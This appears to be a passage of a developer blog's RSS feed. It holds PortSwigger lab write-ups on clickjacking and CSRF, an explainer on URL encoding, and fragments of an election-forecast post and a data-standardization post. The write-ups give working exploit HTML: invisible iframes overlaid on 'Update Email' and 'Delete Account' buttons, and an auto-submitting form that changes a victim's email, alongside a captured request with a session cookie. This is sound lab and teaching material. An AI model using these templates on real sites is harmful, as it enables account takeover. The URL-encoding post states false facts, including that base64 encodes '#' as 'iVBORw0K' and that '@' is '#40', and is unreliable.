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" alt="2022 Brazilian Election Forecast"/><!-- --></p>
</div>
<div id="notes" class="section level2">
<h2>Notes</h2>
<ul>
<li>Polling data was extracted from Wikipedia.<br/>
</li>
<li>A historical spread was measured using past election
results(1989-2018).</li>
<li>This model predicts a winner if the election was done today(due to
the time effect in opinion polls).</li>
<li>A general bias term of 2.5% was added(as seen on USA poll data) but
a proper estimate with Brazilian data may be added later.</li>
</ul>
</div>
<div id="model" class="section level2">
<h2>Model</h2>
<ul>
<li><a href="https://github.com/christianpaez/brazilian-election-analysis-2022" class="uri">R model on Github</a></li>
</ul>
</div>
<div id="references" class="section level2">
<h2>References</h2>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Opinion_polling_for_the_2022_Brazilian_presidential_election" class="uri">https://en.wikipedia.org/wiki/Opinion_polling_for_the_2022_Brazilian_presidential_election</a></li>
</ul>
</div>
<div id="references" class="section level2">
<h2>Image Credit</h2>
<ul>
<li><a href="https://unsplash.com/es/@homajob" class="uri">Scott Graham on Unsplash</a></li>
</ul>
</div>
<!-- code folding -->
<!-- dynamically load mathjax for compatibility with self-contained -->
<script>
(function () {
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "https://mathjax.rstudio.com/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML";
document.getElementsByTagName("head")[0].appendChild(script);
})();
</script>
</body><!--kg-card-end: html-->]]></content:encoded></item><item><title><![CDATA[Portswigger’s lab write up: Clickjacking with form input data prefilled from a URL parameter]]></title><description><![CDATA[In this apprentice level lab, we will exploit the change email flow from a website vulnerable to clickjacking due to form filling via url parameters.]]></description><link>https://artofcode.tech/portswigger-lab-write-up-clickjacking-with-form-input-data-prefilled-from-a-url-parameter</link><guid isPermaLink="false">Ghost__Post__6352f86e6c9909001d4e3c33</guid><category><![CDATA[writeups]]></category><category><![CDATA[portswigger]]></category><category><![CDATA[web]]></category><category><![CDATA[clickjacking]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Fri, 21 Oct 2022 19:58:10 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Green-Neon-Hacking-Tutorials-YouTube-Thumbnail-2-.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Green-Neon-Hacking-Tutorials-YouTube-Thumbnail-2-.png" alt="Portswigger’s lab write up: Clickjacking with form input data prefilled from a URL parameter"/><p>In this apprentice level lab, we will exploit the change email flow from a website vulnerable to clickjacking due to form filling via url parameters.</p><hr><p>Upon logging in with the given credentials, we notice that after going to the acount page, all that is needed to change a user’s email is click on the <code>Update Email</code> button and that the <code>email</code> input can be prefilled by adding it via url parameters. Let’s use the writing material’s clickjacking template to craft our exploit:</p><pre><code class="language-jsx"><head>
<style>
iframe {
position:relative;
width:700px;
height:600px;
opacity:0.1;
z-index:2;
}
div {
position:absolute;
z-index:1;
}
</style>
</head>
<body>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
</iframe>
</body>
</code></pre><p>This is how the template looks on our exploit server:</p><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1.png" class="kg-image" alt="Portswigger’s lab write up: Clickjacking with form input data prefilled from a URL parameter"/></figure><p>We need to modify the location of the <code>CLICK ME</code> div tag so that it is on top of the <code>Update Email</code> button on the vulnerable website. Note that we are setting the iframe’s opacity to <code>0.1</code> to be able to check the exploit appearance and then modifying the div’s top and left CSS properties so that when a logged in user clicks on the <code>CLICK ME</code> div on our website, they are actually clicking on the vulnerable website’s button to update their email to whatever we previously set in the URL parameters. After setting the top property to 450px and the left property to 50px, it looks like the buttons are aligned to perform a successful attack. At this point, our exploit looks like this:</p><pre><code class="language-jsx"><head>
<style>
iframe {
position:relative;
width:700px;
height:600px;
opacity:0.1;
z-index:2;
}
div {
position:absolute;
z-index:1;
top:450px;
left:50px;
}
</style>
</head>
<body>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}?email=attacker@email.com">
</iframe>
</body>
</code></pre><figure class="kg-card kg-image-card"><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2.png" class="kg-image" alt="Portswigger’s lab write up: Clickjacking with form input data prefilled from a URL parameter"/></figure><p>All we need to do is set the iframe’s opacity to 0.00001 or something similar so that it is almost invisible and send the exploit to our victim.</p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/portswiggers-lab-write-up-clickjacking-with-form-input-data-prefilled-from-a-url-parameter-85b7ca24bec1">https://medium.com/@artofcode_/portswiggers-lab-write-up-clickjacking-with-form-input-data-prefilled-from-a-url-parameter-85b7ca24bec1</a><br>Dev.to: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-clickjacking-with-form-input-data-prefilled-from-a-url-parameter-1b41">https://dev.to/christianpaez/portswiggers-lab-write-up-clickjacking-with-form-input-data-prefilled-from-a-url-parameter-1b41</a><br>Github: <a href="https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-form-input-data-prefilled-from-a-url-parameter">https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/clickjacking/clickjacking-with-form-input-data-prefilled-from-a-url-parameter</a></br></br></br></p></hr>]]></content:encoded></item><item><title><![CDATA[Portswigger’s lab write up: Basic clickjacking with CSRF token protection]]></title><description><![CDATA[In this apprentice level lab, we will exploit the delete account flow from a website vulnerable to clickjacking even though there is some CSRF token protection present.]]></description><link>https://artofcode.tech/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection</link><guid isPermaLink="false">Ghost__Post__63434634d96817001dd10f2c</guid><category><![CDATA[writeups]]></category><category><![CDATA[portswigger]]></category><category><![CDATA[web]]></category><category><![CDATA[clickjacking]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 09 Oct 2022 22:14:29 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Green-Neon-Hacking-Tutorials-YouTube-Thumbnail-4-.png" medium="image"/><content:encoded><![CDATA[<img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Green-Neon-Hacking-Tutorials-YouTube-Thumbnail-4-.png" alt="Portswigger’s lab write up: Basic clickjacking with CSRF token protection"/><p>In this apprentice level lab, we will exploit the delete account flow from a website vulnerable to clickjacking even though there is some CSRF token protection present.</p><hr><p>Upon logging in with the given credentials, we notice that after going to the Account’s page, all that is needed to delete a user account is click on the <code>Delete Account</code> button. Let’s use the writing material’s clickjacking template to craft our exploit:</p><pre><code class="language-html"><head>
<style>
iframe {
position:relative;
width:700px;
height:600px;
opacity:0.1;
z-index:2;
}
div {
position:absolute;
z-index:1;
}
</style>
</head>
<body>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}">
</iframe>
</body>
</code></pre><p>This is how the template looks on our exploit server:</p><figure class="kg-card kg-image-card"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/1-1-.png" class="kg-image" alt="Portswigger’s lab write up: Basic clickjacking with CSRF token protection"/></figure><p>We need to modify the location of the <code>CLICK ME</code> div tag so that it is on top of the <code>Delete Account</code> button on the vulnerable website. Note that we are setting the iframe’s opacity to <code>0.1</code> to be able to check the exploit appearance and then modifying the div’s top and left CSS properties so that when a logged in user clicks on the <code>CLICK ME</code> div on our website, they are actually clicking on the vulnerable website’s button to delete their account. After setting the top property to 500px and the left property to 50px, it looks like the buttons are aligned to perform a successful attack. At this point, our exploit looks like this:</p><pre><code class="language-html"><head>
<style>
iframe {
position:relative;
width:700px;
height:600px;
opacity:0.1;
z-index:2;
}
div {
position:absolute;
z-index:1;
top:500px;
left:50px;
}
</style>
</head>
<body>
<div>
CLICK HERE
</div>
<iframe src="${LAB_ACCOUNT_ROUTE_URL}">
</iframe>
</body>
</code></pre><figure class="kg-card kg-image-card"><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/2-1-.png" class="kg-image" alt="Portswigger’s lab write up: Basic clickjacking with CSRF token protection"/></figure><p>All we need to do is set the iframe’s opacity to 0.00001 or something similar so that it is almost invisible and send the exploit to our victim.</p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection-e0238c6d46be">https://medium.com/@artofcode_/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection-e0238c6d46be</a><br>Dev.to: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection-194i">https://dev.to/christianpaez/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection-194i</a><br>Github: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection-194i">https://dev.to/christianpaez/portswiggers-lab-write-up-basic-clickjacking-with-csrf-token-protection-194i</a></br></br></br></p></hr>]]></content:encoded></item><item><title><![CDATA[Portswigger’s lab write up: CSRF vulnerability with no defenses]]></title><description><![CDATA[In this apprentice-level lab, we will exploit a site that contains a CSRF vulnerability in its email change functionality.]]></description><link>https://artofcode.tech/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses</link><guid isPermaLink="false">Ghost__Post__6326107e92becc001d4bc5bd</guid><category><![CDATA[writeups]]></category><category><![CDATA[portswigger]]></category><category><![CDATA[web]]></category><category><![CDATA[csrf]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 17 Sep 2022 18:25:51 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Green-Neon-Hacking-Tutorials-YouTube-Thumbnail-3-.png" medium="image"/><content:encoded><
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Origin: [<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net>](<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/>)
Connection: keep-alive
Referer: [<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/my-account>](<https://0a9a0027047d6aaec1fa58be003b00b3.web-security-academy.net/my-account>)
Cookie: session=bQKVomOrYf95eVTuf4XKAw9zlJQDsUUK
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
</code></pre><p>With the following body structure:</p><pre><code class="language-markdown">email=test@gmail.com
</code></pre><p>Here we are able to identify that the update email action just requires a session cookie to authorize the user and the email parameter to execute this action. Let’s use the reading material’s HTML template for CSRF to build our attack:</p><pre><code class="language-html"><html>
<body>
<form action="<https://vulnerable-website.com/email/change>" method="POST">
<input type="hidden" name="email" value="pwned@evil-user.net" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
</code></pre><p>All we need to do is replace the action attribute of the form component to our lab’s absolute email update endpoint (you can see it on the POST request we performed earlier) and the value attribute of the email input to whatever value we want the victim’s email to change to:</p><pre><code class="language-markdown"><html>
<body>
<form action="{LAB URL}/my-account/change-email" method="POST">
<input type="hidden" name="email" value="attacker@gmail.com" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
</code></pre><p>If we save this as an HTML file, when someone visits our site, the form above will be submitted as soon as the page loads and an email update will be requested (as long as the user is authenticated on the lab’s site since a session cookie is required to perform the email update action). To solve the lab, we have to go to the exploit server, store our HTML code, and send it to the victim.</p><p>Check out this write up on: <br>Medium: <a href="https://medium.com/@artofcode_/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses-a12785f4a14a">https://medium.com/@artofcode_/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses-a12785f4a14a</a></br></p><p>Dev.to: <a href="https://dev.to/christianpaez/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses-4p84">https://dev.to/christianpaez/portswiggers-lab-write-up-csrf-vulnerability-with-no-defenses-4p84</a></p><p>Github: <a href="https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/csrf/csrf-vulnerability-with-no-defenses">https://github.com/christianpaez/portswigger/tree/main/labs/apprentice/csrf/csrf-vulnerability-with-no-defenses</a></p>]]></content:encoded></item><item><title><![CDATA[How does URL decoding and encoding work?]]></title><description><![CDATA[Every time you visit a website, your browser is encoding and decoding URLs under the hood. This is done in order to avoid transmitting invalid or unsafe data; let’s see how URL decoding works on a basic level and why it is important.]]></description><link>https://artofcode.tech/how-does-url-decoding-and-encoding-work</link><guid isPermaLink="false">Ghost__Post__631e26a19224a9001d4add4d</guid><category><![CDATA[blog]]></category><category><![CDATA[web]]></category><category><![CDATA[software]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 11 Sep 2022 18:23:02 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/richy-great-MAYEkmn7G6E-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/richy-great-MAYEkmn7G6E-unsplash.jpg" alt="How does URL decoding and encoding work?"/><p>Every time you visit a website, your browser is encoding and decoding URLs under the hood. This is done in order to avoid transmitting invalid or unsafe data; let’s see how URL decoding works on a basic level and why it is important.</p><hr><p>Encoding a URL is the process of taking a string like this one: <code>https://example.com?param=value#someAnchor</code></p><p>And apply some transformation rules to make it look like this one:</p><p><code>https%3A%2F%2Fexample.com%3Fparam%3Dvalue%23someAnchor</code></p><p>This transformation is important since URLs must follow the URI syntax standard to send only valid and safe data. URL decoding and encoding are usually handled by the web browser or web server that you are using. However, there are times when you might need to encode or decode a URL yourself, so let’s see how it works on a basic level.</p><h3 id="url-decoding-encoding-basics">URL decoding/encoding basics</h3><p>As we mentioned earlier, the URI syntax standard must be followed. Only a special subset of ASCII characters is allowed in URL’s. This consists of the familiar alphanumeric symbols, and some reserved characters for use as control characters.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/uri-valid-characters.png" class="kg-image" alt="How does URL decoding and encoding work?"><figcaption>Taken from https://developers.google.com</figcaption></img></figure><h3 id="encoding-and-decoding-methods">Encoding and Decoding Methods</h3><p>The most common encoding system is called Percent-encoding, which consists of taking a <code>%</code> sign and appending the hexadecimal representation of the ASCII value of this character. For example, the <code>@</code> sign is represented by <code>#40</code>, since 40 is the value of this character in the ASCII table.</p><p>The "base64" method is also sometimes used. With this method, each character is represented by a set of six characters. For example, the character <code>#</code> would be represented as <code>iVBORw0K</code>; you can learn more about base64 in our previous post on Common decoding/encoding systems: <a href="https://artofcode.tech/common-encoding-and-decoding-systems/">https://artofcode.tech/common-encoding-and-decoding-systems/</a></p><hr><p>We hope that this post has helped you understand a bit more about how the modern web technologies and web browsers work under the hood.</p><p>Check out this post on:<br>Medium: <a href="https://medium.com/@artofcode_/how-does-url-decoding-and-encoding-work-93d2c28cbce9">https://medium.com/@artofcode_/how-does-url-decoding-and-encoding-work-93d2c28cbce9</a></br></p><p>Dev.to: <a href="https://dev.to/christianpaez/how-does-url-decoding-and-encoding-work-2i7g">https://dev.to/christianpaez/how-does-url-decoding-and-encoding-work-2i7g</a></p><p>Image credit: Image from Richy Great on Unsplash.</p></hr></hr>]]></content:encoded></item><item><title><![CDATA[Why is it important to standardize datasets?]]></title><description><![CDATA[Data standardizing is a common practice in data science and machine learning. What does it actually mean and why is it beneficial?]]></description><link>https://artofcode.tech</link><guid isPermaLink="false">Ghost__Post__6307c914c7f3d5001df1de22</guid><category><![CDATA[blog]]></category><category><![CDATA[datascience]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 25 Aug 2022 19:15:43 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/mika-baumeister-Wpnoqo2plFA-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/mika-baumeister-Wpnoqo2plFA-unsplash.jpg" alt="Why is it important to standardize datasets?"/><p>Data standardizing is a common practice in data science and machine learning. What does it actually mean and why is it beneficial?</p><hr><h1 id="definition">Definition</h1><p>Standardizing a dataset means to transform the data so that it has a mean of 0 and a standard deviation of 1. This is often done by subtracting the mean from each data point and then dividing by the standard deviation.</p><p>Visually, this means turning a dataset like this:</p><figure class="kg-card kg-image-card"><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/Captura-de-Pantalla-2022-08-22-a-la-s--7.11.41-p.-m..png" class="kg-image" alt="Why is it important to standardize datasets?"/></figure><figure class="kg-card kg-image-card"><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/normal-data.png" class="kg-image" alt="Why is it important to standardize datasets?"/></figure><p>Into this:</p><figure class="kg-card kg-image-card"><img 